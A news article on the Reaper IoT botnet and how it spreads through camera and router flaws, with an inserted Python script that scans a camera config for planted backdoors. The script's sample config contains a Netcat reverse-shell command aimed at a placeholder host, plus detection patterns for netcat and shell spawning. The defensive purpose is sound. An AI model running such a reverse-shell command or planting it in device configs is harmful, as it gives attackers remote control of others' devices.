Do fear the Reaper: Huge army of webcams, routers raised from 'one million' hacked orgs

Check your cameras, broadband gateways, NAS boxes for latest botnet malware

By John Leyden

Miscreants are right now assembling a massive army of hacked Internet of Things devices – and at a far faster rate than the powerful Mirai botnet swelled its ranks last year.

This new cyber-militia of compromised gadgets, dubbed IoT_reaper or Reaper by experts at Qihoo 360 Netlab, can be instructed by its masters to attack websites and smash services offline.

The botnet's foot-soldiers – mainly press-ganged internet-connected cameras, home routers and similar gear – are located in more than a million organizations globally, security biz Check Point claimed on Thursday.

At first, it was assumed the malware infecting gizmos to form this latest army was a variant of the Mirai software nasty that took over hundreds of thousands of internet-connected equipment in 2016. However, security researchers now think it's another family of malicious software. There's no word yet on what exactly the botnet will be used for, either.

The Reaper malware is spreading globally by exploiting various vulnerabilities in embedded devices, such as CVE-2017-8225, which lets attackers lift the usernames and passwords of gadgets' web-based control panels and ultimately commandeer the devices.

Ken Munro of infosec outfit Pen Test Partners pointed out that tomorrow is the one-year anniversary of the Mirai attacks against DNS provider Dyn. He also confirmed, using Shodan.io, that hundreds of thousands of internet-facing devices are potentially vulnerable to Reaper's exploits.

“Shodan shows potential devices,” he said. “We don't know how many have already been compromised, but I've seen comment elsewhere that suggests about 2 million are in a queue to be exploited.”

During this month, the malware has been evolving to exploit vulnerabilities in wireless IP-based cameras, routers, storage boxes, Wi-Fi points, and so on, from vendors including D-Link, TP-Link, Avtech, Netgear, MikroTik, Linksys, and Synology.

For example, one of the botnet's drones – a hacked camera running a GoAhead embedded web server on TCP port 81 – had its System.ini file altered to include a Netcat command that opened a reverse shell: a backdoor, in other words, that gave Reaper's masters command-line access to the device. Once the botnet's malware was on the camera, it proceeded to attempt to infect other equipment on the internet. Any subsequently hacked devices also cruise up and down the information superhighway for more vulnerable gizmos to hijack.

“This tells us that this machine was merely one link in the chain and that it was both infected and then also transmitting the infection,” said security researchers at Check Point. “In this case, the ‘CVE-2017-8225’ vulnerability was used to penetrate the GoAhead device and, after infecting a target machine, that same target started to look for other devices to infect.”
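A defender-side check for the kind of tampering Check Point described, as an added example that is not from the article or from Check Point's own tooling: it scans a GoAhead-style System.ini for an injected Netcat command and reports the offending lines. The config contents, key names and the 203.0.113.5 host are constructed placeholders, not real indicators.

```python
import re
from typing import List, Tuple

# Constructed sample of a camera's System.ini after tampering: ordinary settings
# plus an injected Netcat command. Host and port are documentation placeholders.
SAMPLE_SYSTEM_INI = """\
[SYSTEM]
version=1.0
name=cam01
log_path=/var/log/ncam.log
[NETWORK]
http_port=81
dns=192.0.2.1
[CUSTOM]
start_cmd=nc -e /bin/sh 203.0.113.5 4444 &
"""

# Patterns a reverse-shell backdoor planted in a config file tends to leave behind.
# Word boundaries keep "ncam" or "sync" from tripping the netcat match.
NETCAT_PATTERNS = [
    re.compile(r"\b(nc|netcat|ncat)\b.*\s-e\s"),             # netcat executing a program
    re.compile(r"\b(nc|netcat|ncat)\b.*\|\s*/bin/(ba)?sh"),   # netcat piped into a shell
    re.compile(r"/bin/(ba)?sh\s+-i\b"),                       # interactive shell spawn
    re.compile(r"\bmkfifo\b.*\b(nc|netcat|ncat)\b"),          # fifo-based shell relay
]


def find_backdoor_lines(config_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, line) for every config line matching a backdoor pattern."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        if any(p.search(line) for p in NETCAT_PATTERNS):
            hits.append((lineno, line.strip()))
    return hits


def is_tampered(config_text: str) -> bool:
    """True when at least one suspicious line is present."""
    return bool(find_backdoor_lines(config_text))


if __name__ == "__main__":
    for lineno, line in find_backdoor_lines(SAMPLE_SYSTEM_INI):
        print(f"suspicious line {lineno}: {line}")
```

Run it against a copy of the config pulled from your own device; a clean file produces no output, and any hit is a reason to take the gadget offline and reflash it.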

Right now, check to make sure you're not exposing a vulnerable device to the internet, apply any patches if you can, look out for suspicious behavior on your network, and take a gadget offline if it's infected. ®
